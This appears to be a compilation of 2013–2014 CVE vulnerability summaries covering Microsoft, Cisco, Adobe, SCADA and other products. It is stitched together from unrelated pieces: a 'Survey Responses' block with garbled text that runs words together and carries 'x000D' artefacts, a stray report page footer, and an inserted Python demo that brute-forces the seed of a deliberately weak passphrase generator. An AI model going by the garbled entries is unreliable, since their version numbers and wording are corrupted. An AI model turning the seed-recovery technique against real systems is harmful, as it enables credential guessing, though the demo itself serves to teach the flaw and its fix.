CVE-2014-1808 Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".
CVE-2014-1811 The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".
CVE-2014-1812 The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".
CVE-2014-2014 imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103 Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109 The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364 Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416 Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554 OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643 Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742 Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768 Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.
CVE-2014-2789 Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791 Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-2794 Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.
CVE-2014-2808 Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821 Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-3444 The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489 lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507 Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556 The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580 The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814 The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819 Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872 Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044 OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079 Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082 Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4100 Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105 Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114 Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".
CVE-2014-4127 Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4130 Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132 Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133 Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.
CVE-2014-4141 Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4481 Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617 The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631 RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528 The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040 GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105 IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136 IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164 IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.
CVE-2014-6363 vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".
CVE-2014-6369 Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-6378 Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487 Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250 The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927 The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945 OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447 Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638 The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835 The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159 Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163 Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350 TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357 Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.
CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.
CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.
CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JC###A, JC###B, JD###A, JD###B, JE###A, JF###A, JF###B, JF###C, JG###A, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.
CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.
CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.
CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.
CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).
CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
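The weakness behind CVE-2013-2803 is a property of the generator, not of the product: when a passphrase is derived from a PRNG whose seed comes from a small space, an attacker who captures one passphrase can brute-force the seed instead of the passphrase. The Python below is an added example for this appendix, not ProSoft code and not a reproduction of the ControlScape algorithm: a hypothetical 16-bit-seeded Mersenne Twister generator, the seed-recovery loop an attacker would run, and the hardened form that draws from the operating system CSPRNG. The alphabet, passphrase length and seed size are assumptions chosen for illustration.

```python
import math
import random
import secrets
import string
from typing import Optional

# Constructed example, not ProSoft's algorithm: a passphrase generator whose
# only entropy is a small integer seed (think a 16-bit counter or uptime).
ALPHABET = string.ascii_letters + string.digits
PASSPHRASE_LEN = 12
SEED_BITS = 16  # assumed size of the weak seed space


def weak_passphrase(seed: int) -> str:
    """Deterministic: the same seed always yields the same passphrase, so the
    effective keyspace collapses from 62**12 to 2**SEED_BITS."""
    rng = random.Random(seed)  # Mersenne Twister, not a CSPRNG
    return "".join(rng.choice(ALPHABET) for _ in range(PASSPHRASE_LEN))


def recover_seed(observed: str, seed_bits: int = SEED_BITS) -> Optional[int]:
    """What an attacker does with one captured passphrase: walk the seed
    space and regenerate until the output matches."""
    for seed in range(1 << seed_bits):
        if weak_passphrase(seed) == observed:
            return seed
    return None


def strong_passphrase(length: int = PASSPHRASE_LEN) -> str:
    """Hardened form: OS CSPRNG via secrets; there is no seed to recover."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def effective_bits(alphabet_size: int, length: int, seed_bits: Optional[int]) -> float:
    """Entropy actually available against the attacker: the smaller of the
    nominal output space and the seed space that feeds the generator."""
    nominal = length * math.log2(alphabet_size)
    return nominal if seed_bits is None else min(nominal, float(seed_bits))


if __name__ == "__main__":
    captured = weak_passphrase(31337)  # stands in for a sniffed/leaked passphrase
    print("weak passphrase:", captured, "-> seed recovered:", recover_seed(captured))
    print("nominal bits:", round(effective_bits(len(ALPHABET), PASSPHRASE_LEN, None), 1))
    print("effective bits with a 16-bit seed:", effective_bits(len(ALPHABET), PASSPHRASE_LEN, SEED_BITS))
    print("strong passphrase:", strong_passphrase())
```

The seed-recovery loop finishes in a second or two on a laptop for a 16-bit seed space; the 71-bit nominal strength of a 12-character alphanumeric passphrase is irrelevant when the generator only ever produces 65,536 of them.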
CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 20 of 28
CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
